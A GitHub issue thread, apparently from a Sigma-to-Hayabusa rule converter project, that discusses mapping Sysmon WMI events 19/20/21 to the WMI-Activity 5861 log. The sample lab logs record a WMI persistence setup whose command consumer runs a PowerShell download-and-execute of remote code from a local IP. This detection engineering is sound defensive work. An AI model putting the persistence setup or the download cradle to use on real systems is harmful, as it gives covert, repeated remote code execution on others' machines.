Open YamatoSecurity opened 1 month ago
fukusuket
commented
1 month ago memo:
fukusuket
commented
1 month ago <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>19</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>19</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2024-09-06T06:52:30.642415500Z" />
<EventRecordID>2174</EventRecordID>
<Correlation />
<Execution ProcessID="2296" ThreadID="3500" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>win10</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData>
<Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data>
<Data Name="EventType">WmiFilterEvent</Data>
<Data Name="UtcTime">2024-09-06 06:52:30.636</Data>
<Data Name="Operation">Created</Data>
<Data Name="User">WIN10\vagrant</Data>
<Data Name="EventNamespace">"root/cimv2"</Data>
<Data Name="Name">"Cleanup"</Data>
<Data Name="Query">"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"</Data>
</EventData>
</Event><Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>20</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>20</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2024-09-06T06:52:30.650332200Z" />
<EventRecordID>2175</EventRecordID>
<Correlation />
<Execution ProcessID="2296" ThreadID="3500" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>win10</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData>
<Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data>
<Data Name="EventType">WmiConsumerEvent</Data>
<Data Name="UtcTime">2024-09-06 06:52:30.649</Data>
<Data Name="Operation">Created</Data>
<Data Name="User">WIN10\vagrant</Data>
<Data Name="Name">"DataCleanup"</Data>
<Data Name="Type">Command Line</Data>
<Data Name="Destination">"powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))\""</Data>
</EventData>
</Event><Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>21</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>21</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2024-09-06T06:54:19.794672300Z" />
<EventRecordID>2202</EventRecordID>
<Correlation />
<Execution ProcessID="2296" ThreadID="2884" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>win10</Computer>
<Security UserID="S-1-5-18" />
</System>
- <EventData>
<Data Name="RuleName">technique_id=T1047,technique_name=Windows Management Instrumentation</Data>
<Data Name="EventType">WmiBindingEvent</Data>
<Data Name="UtcTime">2024-09-06 06:54:19.791</Data>
<Data Name="Operation">Created</Data>
<Data Name="User">WIN10\vagrant</Data>
<Data Name="Consumer">"CommandLineEventConsumer.Name=\"DataCleanup\""</Data>
<Data Name="Filter">"__EventFilter.Name=\"Cleanup\""</Data>
</EventData>
</Event><Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-WMI-Activity" Guid="{1418ef04-b0b4-4623-bf7e-d74ab47bbdaa}" />
<EventID>5861</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x4000000000000000</Keywords>
<TimeCreated SystemTime="2024-09-06T06:52:30.676491600Z" />
<EventRecordID>252</EventRecordID>
<Correlation />
<Execution ProcessID="364" ThreadID="5520" />
<Channel>Microsoft-Windows-WMI-Activity/Operational</Channel>
<Computer>win10</Computer>
<Security UserID="S-1-5-18" />
</System>
<UserData>
<Operation_ESStoConsumerBinding xmlns="http://manifests.microsoft.com/win/2006/windows/WMI">
<Namespace>//./root/subscription</Namespace>
<ESS>Cleanup</ESS>
<CONSUMER>CommandLineEventConsumer="DataCleanup"</CONSUMER>
<PossibleCause>Binding EventFilter: instance of __EventFilter { CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 97, 86, 74, 143, 112, 190, 99, 243, 226, 31, 52, 33, 232, 3, 0, 0}; EventNamespace = "root/cimv2"; Name = "Cleanup"; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"; QueryLanguage = "WQL"; }; Perm. Consumer: instance of CommandLineEventConsumer { CommandLineTemplate = "powershell.exe -nop -c \"IEX ((new-object net.webclient).downloadstring('http://172.16.134.129:80/a'))\""; CreatorSID = {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 97, 86, 74, 143, 112, 190, 99, 243, 226, 31, 52, 33, 232, 3, 0, 0}; Name = "DataCleanup"; };</PossibleCause>
</Operation_ESStoConsumerBinding>
</UserData>
</Event>wmi_event rulefukusuket
commented
6 days ago The following events was recorded after running Install-Persistence in the this script.
19/20/215861 (No other EID events recorded were related to the Sysmon 19/20/21)I checked with https://github.com/Yamato-Security/sigma-to-hayabusa-converter/issues/12#issuecomment-2333422689 and found that Sysmon rules only use Event_ID and Destination fields, so it seems that only conversion of these two fields is needed. The conversion logic is as follows:
19/20/21 -> WMI-Activity EID 5861Destination -> WMI-Activity PossibleCause
contains qualifier, so I think it is sufficient to convert only the field name...🤔@YamatoSecurity What do you think?
We may be able to convert
wmi_eventcategories to handle built-in WMI logs.